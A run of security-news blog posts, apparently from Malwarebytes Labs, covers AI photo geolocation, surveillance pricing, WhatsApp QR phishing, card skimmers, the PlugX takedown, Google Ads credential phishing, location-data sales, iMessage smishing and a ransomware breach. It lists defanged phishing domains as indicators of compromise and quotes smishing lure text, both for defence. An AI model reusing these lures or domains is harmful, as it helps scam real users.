Malware Bytes Security

It’s just become even more important to be conscious about the pictures we post online.

GeoSpy is an Artificial Intelligence (AI) supported tool that can derive a person’s location by analyzing features in a photo like vegetation, buildings, and other landmarks. And it can do so in seconds based on one picture.

Graylark Technologies who makes GeoSpy says it’s been developed for government and law enforcement. But the investigative journalists from 404 Media report that the tool has also been used for months by members of the public, with many making videos marveling at the technology, and some asking for help with stalking specific women.

404 Media says the company trained GeoSpy on millions of images from around the world and can recognize distinct geographical markers such as architectural styles, soil characteristics, and their spatial relationships.

Using the tool to determine anyone’s location requires virtually no training, so anybody can do it. Normally, it would take open source intelligence (OSINT) professionals quite some time of training and experience to reach the level of speed and accuracy that GeoSpy delivers to an untrained individual.

This means that even the most non tech-savvy individual could find a person of interest based on pictures posted on social media, despite the fact that social media strips the metadata—which could include GPS coordinates or other useful information—from these pictures.

Based on its testing and conversations with users, 404 Media concluded:

“GeoSpy could radically change what information can be learned from photos posted online, and by whom.”

Even if the tool is unable to narrow down the location to an exact street address or block, based on vegetation it can bring down the search area to a few square miles.

The company’s founder says he has pushed back against requests from people asking to track particular women. Now GeoSpy has closed off public access to the tool, after 404 Media asked him for a comment.

Aside from the contribution towards a surveillance society, the risks of such a tool are obvious. It poses several significant dangers, particularly concerning privacy, security, and potential abuse if a stalker can access it. Another worry concerns the security of the storage for the data that is used and found by this tool. When involved in a breach, a host of information could become available to cybercriminals.

We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

Companies are showing customers different prices for the same goods and services based what data they have on them, including details like their precise location or browser history.

The name for this method is surveillance pricing, and the FTC has just released initial findings of a report looking into that practice. In July 2024, the FTC requested information from eight companies offering surveillance pricing products and services that incorporate data about consumers’ characteristics and behavior.

The goal was to get a better understanding of the “shadowy market” that third-party intermediaries use to set individualized prices for products and services based on consumers’ characteristics and behaviors, like location, demographics, browsing patterns, and shopping history.

Speaking to staff at these firms, the FTC found that behaviors ranging from mouse movements on a webpage to the type of products that consumers leave in an online shopping cart without clicking Buy can be tracked and used by retailers to tailor consumer pricing.

The intermediaries claimed they used advanced algorithms, artificial intelligence, and other technologies, along with personal information about consumers to determine targeted prices.

FTC chair Lina M. Khan said:

 “Americans deserve to know whether businesses are using detailed consumer data to deploy surveillance pricing, and the FTC’s inquiry will shed light on this shadowy ecosystem of pricing middlemen.”

The first priorities to investigate are:

• The types of products and services engaged in surveillance pricing
• Data sources and who collected them
• Who the potential customers are
• How surveillance pricing impacted the prices offered to these customers.

This is nothing new, we’ve seen numerous times that insurance companies are very interested in our lifestyle and will happily charge more or even refuse to take us in as customers if they think we’re too much of a risk.

But, needless to say, surveillance pricing can have serious consequences, not only for our privacy, but also for fair competition and for consumer protection.

Probably the most shocking thing is the type of information that could be involved. The FTC notes that some of these companies even created lists of people suffering from diseases for the purpose of targeting them with offers for ineffective or worthless cures. This makes the introduction of a bill saying data brokers should stop trading health and location data perfectly understandable.

What can you do?

When it comes to sharing data online, we’ve all heard someone say, “What’s the big deal when I have nothing to hide?”

Well, this is exactly the deal: By exposing their private data online, they might well end up with companies charging them more. It’s a no brainer that we should all be sharing as little as possible. Here’s how:

• Limit what you share on social media as much as possible, and try to keep personal data out of photos and written posts
• Only tell companies the information that they need for the service or product they’re providing. Use false information as much as possible
• If you are asked to share your location data with an app and there’s no clear reason why you might need to, deny the app that permission
• If you have to share your location—for example, when using a map app—choose the “Allow only while using the app” option, so that it will be unable to continuously track your location and movement
• Read privacy policies, however boring they are. Understand how the company will be using your data
• Block web tracking wherever you can. Malwarebytes Browser Guard automatically declines the cookie consent banners you see on websites, opting you out of data collection performed by tracking cookies (and it’s free).

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Last week on Malwarebytes Labs:

• iMessage text gets recipient to disable phishing protection so they can be phished
• The new rules for AI and encrypted messaging, with Mallory Knodel (Lock and Code S06E01)
• Insurance company accused of using secret software to illegally collect and sell location data on millions of Americans
• The great Google Ads heist: criminals ransack advertiser accounts via fake Google ads
• PlugX malware deleted from thousands of systems by FBI
• Avery had credit card skimmer stuck on its site for months
• WhatsApp spear phishing campaign uses QR codes to add device

Last week on ThreatDown:

• Web shop spreads SocGolish malware and steals credit cards
• 8 zero-days in one Patch Tuesday? Welcome to 2025

Stay safe!

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

A cybercriminal campaign linked to Russia is deploying QR codes to access the WhatsApp accounts of high-profile targets like journalists, members of think tanks, and employees of non-governmental organizations (NGOs), according to new details revealed by Microsoft.

The group, which Microsoft tracks by the name “Star Blizzard,” is also referred to as Coldriver by other researchers. Last year, the group created impersonation accounts where members posed as experts in a field that their targets might be interested in—or that was somehow affiliated with the target. Once a relationship had been established, the target would receive a phishing link or a document that contained a phishing link.

But over time, that tactic became widely known, and part of the cybercriminals’ infrastructure was taken down. Now, it seems the group has changed tactics and is sending QR codes instead of malicious links to the targets that they have established an initial relationship with.

These QR codes do not take the target to a malicious website, nor will they join them to the promised WhatsApp group on “the latest non-governmental initiatives aimed at supporting Ukraine NGOs,” as is claimed in one of the cybercriminal lures.

In reality, the link in the QR code is intentionally broken. The idea is that the target will respond with a remark about the broken link. When that happens the cybercriminals send out a shortened URL to a website that displays another QR code.

Screenshot courtesy of Microsoft

“I apologize for the inconvenience with the QR code. Kindly try this alternative link: US-Ukraine NGOs Group
It should work without any issues.

By scanning this QR code and following the instructions on the website they confirm the addition of an extra device to the WhatsApp account of the target. With that access the group can read the messages in their WhatsApp account and use existing browser plugins, particularly those designed for exporting WhatsApp messages from an account accessed via WhatsApp Web.

How to stay safe

These spear phishing campaigns are highly targeted and you’ll probably never see an invite to this group. But cybercriminals tend to copy ideas that work, so you may see them in another form.

There are a few simple rules that will help you avoid this kind of phishing.

• Always hover over links before clicking them.
• When you find a shortened URL, think about the possible reason for shortening. Was there a real need to do this or is it just meant to hide the destination?
• When still in doubt, unshorten the URL.
• When following instructions on a website, scrutinize whether the prompts on your device actually match the expected ones. WhatsApp will double-check whether you want to add a device to the account.
• Double-check whether the sender is who they claim to be through another method of contact.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

The consequences of a wave of credit card skimmers—which is normal around the holidays—are starting to show.

Label maker Avery has filed a data breach notification, saying 61,193 people may have had their credit card details stolen.

On December 9, Avery said it became aware of an attack on its systems. An investigation showed that cybercriminals had inserted malicious software that was used to “scrape” credit card information used on its website. This credit card skimmer was active between July 18, 2024, and December 9, 2024.

Avery has sent emails to affected customers to let them know their data has been stolen.

The information potentially included:

• First and last name
• Billing and shipping address
• Email address
• Phone number if provided
• Payment card information including CVV number and expiration date
• Purchase amount

Avery says it has received a number of reports from affected customers who said that they incurred a fraudulent charge and/or received a phishing email.

A credit card skimmer is a piece of malware that is injected into a website, often through vulnerabilities in the content management system (CMS) or the plugins that the site owner uses. 

When visiting a site that has a card skimmer on it, you’re unlikely to even know it is there. Card skimmers are experts in injecting JavaScript code, especially on web shops which heavily rely on that type of code, which increases the chance that the extra code will not stand out. Sadly, card skimmers are all too commonplace, but there are things you can do to prevent your details being caught by one.

How to protect yourself from card skimmers

• Run a security solution and keep it up to date. Most antivirus products—including Malwarebytes Premium—offer some kind of web protection that detects malicious domains and IP addresses.
• Enable in-browser protection. Malwarebytes Browser Guard—a browser extension available for Chrome, Edge, Firefox and Safari—blocks card skimmers. It also stops annoying ads and trackers, warns about breaches, and flags malicious websites. You can see it in action here, blocking a piece of JavaScript hosted on an otherwise legitimate site:

Malwarebytes Browser Guard blocks credit card skimmer JavaScript

• Keep an eye on your financial statements. Regularly check your online bank and credit card statements. Flag anything that seems suspicious.
• Set up identity and credit monitoring. Identity monitoring alerts you if your personal information is found being illegally traded online, and helps you recover after. Credit monitoring tracks your credit report and borrowing behavior and alerts you if anything changes. A breached company may offer this as a service to you (like Avery is), but you can also get different levels of monitoring solutions, depending on your individual need.

More information on how to act after falling victim to a data breach can be found in our article: Involved in a data breach? Here’s what you need to know.

The FBI says it has removed PlugX malware from thousands of infected computers worldwide.

The move came after suspicion that cybercriminals groups under control of the People’s Republic of China (PRC) used a version of PlugX malware to control, and steal information from victims’ computers.

PlugX has been around since at least 2008 but is under constant development. With the remote access it provides criminals, it is often used to spy on users and plant additional malware on interesting systems.

Among others, the PlugX Remote Access Trojan (RAT) was used in a lasting campaign uncovered last year in which a Chinese group known as “Velvet Ant” used compromised F5 BIG-IP appliances to gain access to networks, managing to stay hidden for years.

US Attorney Jacqueline Romero for the Eastern District of Pennsylvania commented:

“This wide-ranging hack and long-term infection of thousands of Windows-based computers, including many home computers in the United States, demonstrates the recklessness and aggressiveness of PRC state-sponsored hackers.”

After researchers found out that thousands of infected machines reported to one specific IP address, they managed to seize control over the IP address that served as a Command & Control (C2) server.

In close cooperation with the French authorities, the FBI and Justice Department used this IP address to “sinkhole” the botnet. Sinkholing in this context means that the redirection of traffic from its original destination to one specified by the sinkhole owners. The altered destination is known as the sinkhole.

With control of the sinkhole, a specially configured DNS server can simply route the requests of the bots to a fake C2 server. This provides the controller of the sinkhole with valuable information about the affected systems and an opportunity to send commands to delete the PlugX version from the connecting devices.

FBI special agent in Charge Wayne Jacobs of the FBI Philadelphia Field Office said:

“The FBI worked to identify thousands of infected US computers and delete the PRC malware on them. The scope of this technical operation demonstrates the FBI’s resolve to pursue PRC adversaries no matter where they victimize Americans.”

The FBI says it is notifying those who had the malware deleted from their computers via their internet service providers (ISPs).

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Table of contents

• Overview
• Criminals impersonate Google Ads
• Lures hosted on Google Sites
• Phishing for Google account credentials
• Victimology
• Who is behind these campaigns?
• Fuel for other malware and scam campaigns
• Indicators of Compromise

Overview

Online criminals are targeting individuals and businesses that advertise via Google Ads by phishing them for their credentials — ironically — via fraudulent Google ads.

The scheme consists of stealing as many advertiser accounts as possible by impersonating Google Ads and redirecting victims to fake login pages. We believe their goal is to resell those accounts on blackhat forums, while also keeping some to themselves to perpetuate these campaigns.

This is the most egregious malvertising operation we have ever tracked, getting to the core of Google’s business and likely affecting thousands of their customers worldwide. We have been reporting new incidents around the clock and yet keep identifying new ones, even at the time of publication.

The following diagram illustrates at a high level the mechanism by which advertisers are getting fleeced:

Figure 1: Process flow for this Google Ads heist campaign

Back to top

Criminals impersonate Google Ads

Advertisers are constantly trying to outbid each other to reach potential customers by buying ad space on the world’s number one search engine. This earned Google a whopping $175 billion in search-based ad revenues in 2023. Suffice to say, the budgets spent in advertising can be considerable and of interest to crooks for a number of reasons.

We first started noticing suspicious activity related to Google accounts somewhat accidentally, and after a deeper look we were able to trace it back to malicious ads for… Google Ads itself! Very quickly we were overwhelmed by the onslaught of fraudulent “Sponsored” results, specifically designed to impersonate Google Ads, as can be seen in Figure 2:

Figure 2: A malicious ad masquerading as Google Ads

While it is hard to believe such a thing could actually happen, the proof is there when you click on the 3-dot menu that shows more information about the advertiser. We have partially masked the victim’s name, but clearly it is not Google; they are just one of the many accounts that have already been compromised and abused to trick more users:

Figure 3: The advertiser behind this ad is not affiliated with Google at all

People who will see those ads are individuals or businesses that want to advertise on Google Search or already do. Indeed, we saw numerous ads specifically for each scenario, sign up or sign in, as seen in Figure 4:

Figure 4: Two ads for signing up and sign in to Google Ads respectively

The fake ads for Google Ads come from a variety of individuals and businesses, in various locations. Some of those hacked accounts already had hundreds of other legitimate ads running, and one of them was for a popular Taiwanese electronics company.

Figure 5: Victim accounts spending their own budgets on fake Google Ads

To get an idea of the geographic scope of these campaigns, we performed the same Google search simultaneously from several different geolocations (using proxies). First, here’s the malicious ad from a U.S. IP address belonging to a business registered in Paraguay:

Figure 6: U.S.-based search showing fake Google ad

Now, here’s that same ad that appears on Google Search in several other countries:

Figure 7: The same ad found in different countries

Back to top

Lures hosted on Google Sites

Once victims click on those fraudulent ads, they are redirected to a page that looks like Google Ads’ home page, but oddly enough, it us hosted on Google Sites. These pages act as a sort of gateway to external websites specifically designed to steal the usernames and passwords from the coveted advertisers’ Google accounts.

Figure 8: A malicious Google Sites page impersonating Google Ads

There’s a good reason to use Google Sites, not only because it’s a free and a disposable commodity but also because it allows for complete impersonation. Indeed, you cannot show a URL in an ad unless your landing page (final URL) matches the same domain name. While that is a rule meant to protect abuse and impersonation, it is one that is very easy to get around.

Figure 9: The rule that stipulates display URLs and final URLs must have matching domains

Looking back at the ad and the Google Sites page, we see that this malicious ad does not strictly violate the rule since sites.google.com uses the same root domains ads ads.google.com. In other words, it is allowed to show this URL in the ad, therefore making it indistinguishable from the same ad put out by Google LLC..

Figure 10: The malicious ad does not violate Google’s rule on the use of the display URL

Back to top

Phishing for Google account credentials

After the victims click on the “Start now” button found on the Google Sites page, they are redirected to a different site which contains a phishing kit. JavaScript code fingerprints users while they go through each step to ensure all important data is being surreptitiously collected.

Figure 12: The actual phishing page that follows

Finally, all the data is combined with the username and password and sent to the remote server via a POST request. We see that criminals even receive the victim’s geolocation, down to the city and internet service provider.

Figure 12: POST web request with victim’s details

Back to top

Victimology

There are multiple online reports of people who saw the fake Google Ads and shared their experiences:

• Help with removing a dangerous scam in Google Ads (Google Ads Help forum)
• Google Ads Phishing Scam (Reddit)
• It’s just me or Google just sponsored a link to a phising site for Google ads? (Reddit)
• Be aware of fake google page, clicked by accident (Reddit)
• Warning! First sponsorized google answer for “Google ads” is a phishing attempt ! (BlueSky)

We were able to get in touch with a couple of victims who not only saw the ads but were actually scammed and lost money. Thanks to their testimony and our own research, we have a better idea of the criminals’ modus operandi:

• Victim enters their Google account information into phishing page
• Phishing kit collects unique identifier, cookies, credentials
• Victim may receive an email indicating a login from an unusual location (Brazil)
• If the victim fails to stop this attempt, a new administrator is added to the Google Ads account via a different Gmail address
• Threat actor goes on a spending spree, locks out victim if they can

Back to top

Who is behind these campaigns?

We identified two main groups of criminals running this scheme but the more prolific by far is one made of Portuguese speakers likely operating out of Brazil. Victims have also shared that they had received a notification from Google indicating suspicious logins from Brazil. Unfortunately, those notifications often came too late or where dismissed as legitimate, and the criminals already had time to do some damage.

We should also note a third campaign that is very different from the other two, and where the threat actors’ main goal is to distribute malware. The Google Ads phishing scheme may have been a temporary run which was not their main focus.

Brazilian team

In the span of a few days, we reported over 50 fraudulent ads to the Google Ad team all coming from this Brazilian group. We quickly realized that no matter how many reported incidents and takedowns, the threat actors managed to keep at least one malicious ad 24/7.

Figure 13 shows the network traffic resulting from a click on the ad. You will see multiple hops before finally arriving to the phishing portal. The second URL shows the crooks are using a paid service to detect fake traffic.

Figure 13: Network traffic from the ‘Brazilian campaign’

Within the JavaScript code part of the phishing kit, there are comments in Portuguese. Figure 14 shows a portion of the code that does browser fingerprinting, which is a way of identifying users. Browser language, system CPU, memory, screen-width, and time zone are some of the data points collected and then hashed.

Figure 14: Identifying users via various settings Asian team

The second group is using advertiser accounts from Hong Kong and appears to be Asia-based, perhaps from China. Interestingly, they also use the same kind of delivery chain by leveraging Google sites. However, their phishing kit is entirely different from their Brazilian counterparts.

Figure 15: Web traffic for the ‘Chinese campaign’

Figure 16 below shows a code extract with comments in Chinese, as well as a function called xianshi, which could be in reference to a Chinese general of the late Qing dynasty or even a superhero from more modern gaming and literature.

Figure 16: Code with comments in Chinese Third campaign (possibly Eastern European)

We observed another campaign which has a very different modus operandi. Google Sites is not involved at all, and instead they rely on a fake CAPTCHA lure and heavy obfuscation of the phishing page.

Interestingly, the malicious ad we found was for Google Authenticator, despite the obvious ads-goo[.]click domain name. However, for about day or so, the redirect from that domain lead directly to a phishing portal hosted at ads-overview[.]com.

The reason why we suggest the threat actors may be Eastern Europeans here is because of the type of redirects and obfuscation. There is also a distant feel of ‘software download via Google ads’ we have reported on previously (see Threat actor impersonates Google via fake ad for Authenticator).

Figure 17: A malicious ad for Google Authenticator and fake CAPTCHA

A PHP script (cloch.php) then determines if the visitor is genuine or not (likely doing a server-side IP check). VPNs, bot and detection tools will get a “white” page showing some bogus instructions on how to run a Google Ads campaign. Victims are instead redirected to ads-overview[.]com which is a phishing portal for Google accounts.

Figure 18: Cloaking in action with a ‘white’ page or the phishing page

When we checked back on this campaign a few days later, we saw that the ad URL now redirected to a fake Google Authenticator site, likely to download malware. The redirection mechanism is shown in Figure 20:

Figure 19: Web traffic for fake Google Authenticator site

Back to top

Fuel for other malware and scam campaigns

Stolen Google Ads accounts are a valuable commodity among thieves. As we have detailed it many times on this blog, there are constant malvertising campaigns leveraging compromised advertiser accounts to buy ads that push scams or deliver malware.

• Printer problems? Beware the bogus help
• Malicious ad distributes SocGholish malware to Kaiser Permanente employees
• Hello again, FakeBat: popular loader returns after months-long hiatus
• Large scale Google Ads campaign targets utility software

If you think about it for a second, crooks are using someone else’s budget to further continue spreading malfeasance. Whether those dollars are spent towards legitimate ads or malicious ones, Google still earns revenues from those ad campaigns. The losers are the hacked advertisers and innocent victims that are getting phished.

As result, taking action on compromised ad accounts plays a key part in driving down malvertising attacks. Google has yet to show that it takes definitive steps to freeze such accounts until their security is restored, despite their own policy on the subject (Figure 20). For example, we recently saw a case where the same advertiser that had already been reported 30 times, was still active.

Figure 20: Google’s policy regarding violations

As the scourge of fraudulent ads continues, we urge users to pay particular attention to sponsored results. Ironically, it’s quite possible that individuals and businesses that run ad campaigns are not using an ad-blocker (to see their ads and those from their competitors), making them even more susceptible to fall for these phishing schemes.

We don’t just report on threats—we block them

Cybersecurity risks should never spread beyond a headline. Keep threats off by downloading Malwarebytes Browser Guard today.

Back to top

Indicators of Compromise

Fake Google Sites pages

sites[.]google[.]com/view/ads-goo-vgsgoldx
sites[.]google[.]com/view/ads-word-cmdw
sites[.]google[.]com/view/ads-word-makt
sites[.]google[.]com/view/ads-word-whishw
sites[.]google[.]com/view/ads-word-wwesw
sites[.]google[.]com/view/ads-word-xvgt
sites[.]google[.]com/view/ads3dfod6hbadvhj678
sites[.]google[.]com/view/aluado01
sites[.]google[.]com/view/ap-rei-pandas
sites[.]google[.]com/view/appsd-adsd
sites[.]google[.]com/view/asd-app-goo
sites[.]google[.]com/view/connectsing/addss
sites[.]google[.]com/view/connectsingyn/ads
sites[.]google[.]com/view/entteraccess
sites[.]google[.]com/view/exercitododeusvivo
sites[.]google[.]com/view/fjads
sites[.]google[.]com/view/goitkm/google-ads
sites[.]google[.]com/view/hdgstt
sites[.]google[.]com/view/helpp2k
sites[.]google[.]com/view/hereon/1sku4yf
sites[.]google[.]com/view/hgvfvd
sites[.]google[.]com/view/joaope-defeijao
sites[.]google[.]com/view/jthsjd
sites[.]google[.]com/view/logincosturms/ads
sites[.]google[.]com/view/logins-words-officails
sites[.]google[.]com/view/logins-words-officsdp
sites[.]google[.]com/view/marchatrasdemarcha
sites[.]google[.]com/view/newmanage/page
sites[.]google[.]com/view/one-vegas
sites[.]google[.]com/view/one-vegasw
sites[.]google[.]com/view/onvg-ads-word
sites[.]google[.]com/view/oversmart/new
sites[.]google[.]com/view/pandareidel
sites[.]google[.]com/view/polajdasod6hbad
sites[.]google[.]com/view/ppo-ads
sites[.]google[.]com/view/quadrilhadohomemtanacasakaraio
sites[.]google[.]com/view/ricobemnovinhos
sites[.]google[.]com/view/s-ad-offica
sites[.]google[.]com/view/s-wppa
sites[.]google[.]com/view/sdawjj
sites[.]google[.]com/view/semcao
sites[.]google[.]com/view/sites-gb
sites[.]google[.]com/view/so-ad-reisd
sites[.]google[.]com/view/spiupiupp-go
sites[.]google[.]com/view/start-smarts
sites[.]google[.]com/view/start-smarts/homepage/
sites[.]google[.]com/view/umcincosetequebratudo
sites[.]google[.]com/view/vewsconnect
sites[.]google[.]com/view/vinteequatroporquarenta
sites[.]google[.]com/view/xvs-wods-ace
sites[.]google[.]com/view/zeroumnaoezerodois
sites[.]google[.]com/view/zeroumonlinecomosmp

Phishing domains

account-costumers[.]site
account-worda-ads[.]benephica[.]com
account-worda-ads[.]cacaobliss[.]pt
account[.]universitas-studio[.]es
accounts-ads[.]site
accounts[.]google[.]lt1l[.]com
accounts[.]goosggles[.]com
accounts[.]lichseagame[.]com
accousnt-ads[.]tmcampos[.]pt
accousnt[.]benephica[.]pt
accousnt[.]hyluxcase[.]me
ads-goo[.]click
ads-goog[.]link
ads-google[.]io-es[.]com
ads-overview[.]com
ads1.google.lt1l.com
ads1[.]google[.]veef8f[.]com
adsettings[.]site
adsg00gle-v3[.]vercel[.]app
adsgsetups[.]shop
advertsing-acess[.]site
advertsing-v3[.]site
as[.]vn-login[.]shop
benephica[.]pt
cacaobliss[.]pt
colegiopergaminho[.]pt
docs-pr[.]top
tmcampos[.]pt
vietnamworks[.]vn-login[.]shop

Back to top

Insurance company Allstate and its subsidiary Arity unlawfully collected, used, and sold data about the location and movement of Texans’ cell phones through secretly embedded software in mobile apps, according to Texas Attorney General Ken Paxton.

Attorney General Paxton says the companies didn’t give consumers notice or get their consent, which violates Texas’ new Data Privacy and Security Act.

Arity would pay app developers to incorporate software that tracks consumers’ driving data in their apps. When consumers installed these apps they unwittingly downloaded that software, which allowed Arity to monitor the consumer’s location and movement in real-time.

Using this method, the company collected trillions of miles worth of location data from over 45 million people across the US, and used the data to create the “world’s largest driving behavior database.”

Allstate then used the covertly obtained data to justify raising insurance rates, according to Attorney General Paxton. Allstate is accused of not just using the data for its own business, but also for selling it on to third parties, including other car insurance carriers.

Location and movement data is valuable for insurance companies when they are preparing a quote. By having insight in the driver’s behavior, they can offer a rate that covers the risk better.

Car manufacturers are known to be selling similar data on to insurance companies. Last year, Attorney General Paxton sued General Motors (GM) for the unlawful collection and sale of over 1.5 million Texans’ private driving data to insurance companies, also without their knowledge or consent.

Privacy violation aside, these companies don’t always keep the data safe. Just last week we spoke about a breach at data broker Gravy Analytics, which is said to have led to the loss of millions of people’s sensitive location data.

Back to the Allstate case, the Texas Data Privacy and Security Act (TDPSA) requires clear notice and informed consent regarding how a company will use Texans’ sensitive data. That is something which Allstate allegedly failed to do.

In the press release, Paxton states:

“Our investigation revealed that Allstate and Arity paid mobile apps millions of dollars to install Allstate’s tracking software. The personal data of millions of Americans was sold to insurance companies without their knowledge or consent in violation of the law. Texans deserve better and we will hold all these companies accountable.”

Protect your location data

Sometimes apps ask permission to use your location data and you find yourself wondering, why does this app need to know where my phone is?

This is one possible reason.

Whenever you are asked to share your location data with an app and there’s no clear reason why you might need to, deny the app that permission.

If you have to share your location—for example, when using a map app—choose the “Allow only while using the app” option, so that it will be unable to continuously track your location and movement.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

This week on the Lock and Code podcast…

The era of artificial intelligence everything is here, and with it, come everyday surprises into exactly where the next AI tools might pop up.

There are major corporations pushing customer support functions onto AI chatbots, Big Tech platforms offering AI image generation for social media posts, and even Google has defaulted to include AI-powered overviews into everyday searches.

The next gold rush, it seems, is in AI, and for a group of technical and legal researchers at New York University and Cornell University, that could be a major problem.

But to understand their concerns, there’s some explanation needed first, and it starts with Apple’s own plans for AI.

Last October, Apple unveiled a service it is calling Apple Intelligence (“AI,” get it?), which provides the latest iPhones, iPads, and Mac computers with AI-powered writing tools, image generators, proof-reading, and more.

One notable feature in Apple Intelligence is Apple’s “notification summaries.” With Apple Intelligence, users can receive summarized versions of a day’s worth of notifications from their apps. That could be useful for an onslaught of breaking news notifications, or for an old college group thread that won’t shut up.

The summaries themselves are hit-or-miss with users—one iPhone customer learned of his own breakup from an Apple Intelligence summary that said: “No longer in a relationship; wants belongings from the apartment.”

What’s more interesting about the summaries, though, is how they interact with Apple’s messaging and text app, Messages.

Messages is what is called an “end-to-end encrypted” messaging app. That means that only a message’s sender and its recipient can read the message itself. Even Apple, which moves the message along from one iPhone to another, cannot read the message.

But if Apple cannot read the messages sent on its own Messages app, then how is Apple Intelligence able to summarize them for users?

That’s one of the questions that Mallory Knodel and her team at New York University and Cornell University tried to answer with a new paper on the compatibility between AI tools and end-to-end encrypted messaging apps.

Make no mistake, this research isn’t into whether AI is “breaking” encryption by doing impressive computations at never-before-observed speeds. Instead, it’s about whether or not the promise of end-to-end encryption—of confidentiality—can be upheld when the messages sent through that promise can be analyzed by separate AI tools.

And while the question may sound abstract, it’s far from being so. Already, AI bots can enter digital Zoom meetings to take notes. What happens if Zoom permits those same AI chatbots to enter meetings that users have chosen to be end-to-end encrypted? Is the chatbot another party to that conversation, and if so, what is the impact?

Today, on the Lock and Code podcast with host David Ruiz, we speak with lead author and encryption expert Mallory Knodel on whether AI assistants can be compatible with end-to-end encrypted messaging apps, what motivations could sway current privacy champions into chasing AI development instead, and why these two technologies cannot co-exist in certain implementations.

“An encrypted messaging app, at its essence is encryption, and you can’t trade that away—the privacy or the confidentiality guarantees—for something else like AI if it’s fundamentally incompatible with those features.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

A smishing (SMS phishing) campaign is targeting iMessage users, attempting to socially engineer them into bypassing Apple’s built in phishing protection.

For months, iMessage users have been posting examples online of how phishers are trying to get around this protection. And, now, the campign is gaining traction, according to our friends at BleepingComputer.

It works like this: Under normal circumstances, iMessage will disable all links in messages from unknown senders to protect the user against clicking them by accident. However, if a user replies to a message or adds the sender to their contact list, the links are enabled, allowing the person to click on the link.

The text of the messages comes in all the variations that phishers love to use:

• Undeliverable packages from USPS, EVRI, Royal Mail, DHL, Fedex, etc.
• Unpaid road toll.
• Owed shipping fees.
• Other outstanding payments that you are unaware of.

But they all end in a similar way to this:

“(Please reply Y, then exit the SMS, re-open the SMS activation link, or copy the link to open in Safari)”

Replying with Y (or actually anything) will enable the links and turn off iMessage’s built-in phishing protection. Clicking the link will then lead the recipient to whatever malicious website the phisher had in mind. Even if the user just replies with “Y” and then decides not to follow the link—because it looks slightly off—the phishers will know that they have found a likely target for more attacks.

It’s also important to know that there are similar instructions for the Chrome browser:

“Reply with 1, exit the SMS message, and reopen the SMS activation link, or copy the link to Google Chrome to open it.)”

How to avoid smishing scams

• Never reply to suspicious messages, even if it’s only a “Y” or “1.” It will tell the phishers they have a live number and they will bombard you with more attempts.
• Never add a number you don’t know to your Contacts as that will disable the iMessage protection as well.
• Don’t assume any message is the real deal. If you’re being asked to do something, contact the company directly via a known method you trust. If it turns out to be a fake, you should be able to report it to them, there and then.
• If you live somewhere with a Do Not Call list or spam reporting service, make full use of it. Report bogus messages and numbers.
• Your mobile device may already have some form of “safe” message ID enabled without you knowing. It’s tricky to give specific advice here because of the sheer difference of options available on models of phone, but the Options / Safety / Security / Privacy menus are a good place to start.
• Check the link before you click it or copy it in your browser. Is it exactly what you would expect it to be? Scammers often use typosquatting techniques (for example evri[.]top instead of the legitimate evri[.]com, or they fabricate a link that uses the subdomain to make it look legitimate (for example usps.com-track.infoam[.]xyz). If it doesn’t look real then don’t click on it.
• If a message sounds too good (or bad) to be true, it probably is.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Last week on Malwarebytes Labs:

• Dental group lied through teeth about data breach, fined $350,000
• AI-supported spear phishing fools more than 50% of targets
• US Cyber Trust Mark logo for smart devices is coming
• GroupGreeting e-card site attacked in “zqxq” campaign
• Massive breach at location data seller: “Millions” of users affected
• Google Chrome AI extensions deliver info-stealing malware in broad attack
• BayMark Health Services sends breach notifications after ransomware attack

Last week on ThreatDown:

• What is a Man-in-the-Middle (MitM) attack?
• Akira ransomware’s secret weapon—AnyDesk

Stay safe!

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

BayMark Health Services, Inc. (BayMark) notified an unknown number of patients that attackers stole their personal and health information.

BayMark profiles itself as North America’s largest provider of medication-assisted treatment (MAT) for substance use disorders helping tens of thousands of individuals with recovery.

In a breach notification, the company disclosed that on October 11, 2024 it learned about an incident that disrupted the operations of some of its IT systems. This incident consisted of an unauthorized party accessing some of the files on BayMark’s systems between September 24 and October 14 of last year.

An investigation showed that the exposed files contained information that varied per patient but could have included the patient’s name and one or more of the following:

• Social Security number (SSN)
• Driver’s license number
• Date of birth
• The services received and the dates of service
• Insurance information
• Treating provider
• Treatment and/or diagnostic information

While BayMark did not provide any information about the number of victims or the nature of the accident, it has been separately reported that the RansomHub ransomware group has BayMark listed on their leak site.

The RansomHub ransomware group claims to have exfiltrated an enormous 1.5 terabytes of sensitive data from BayMark Health Services.

BayMark’s listing on RansomHub leak site

The date on the dark web site matches the date published in the breach notification. Further, the fact that the data are listed as “published” means that BayMark did not pay the ransom, which is confirmed by the cybercriminals you click through on the company’s tile.

Here, the ransomware group lays blame on the company itself. This isn’t rare for a ransomware group, as the tactics and vernacular are often based around shame, guilt, and a pre-teen-like arrogance. As claimed in the dark web site:

One of the few companies from Texas that does not value its data. For a nominal fee, they could have not worried about anything, improved their network and protected themselves. But they chose the path of destroying their reputation, publishing sensitive data and publicizing it in the media.

{names}

These people decided to do other things than their company. BayMark Health Services is dedicated to providing treatment tailored to meet each person regardless of where they are in their recovery journey. BayMark provides a full continuum of care, integrating evidence-based practices, clinical counseling, recovery support, and medical services.

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

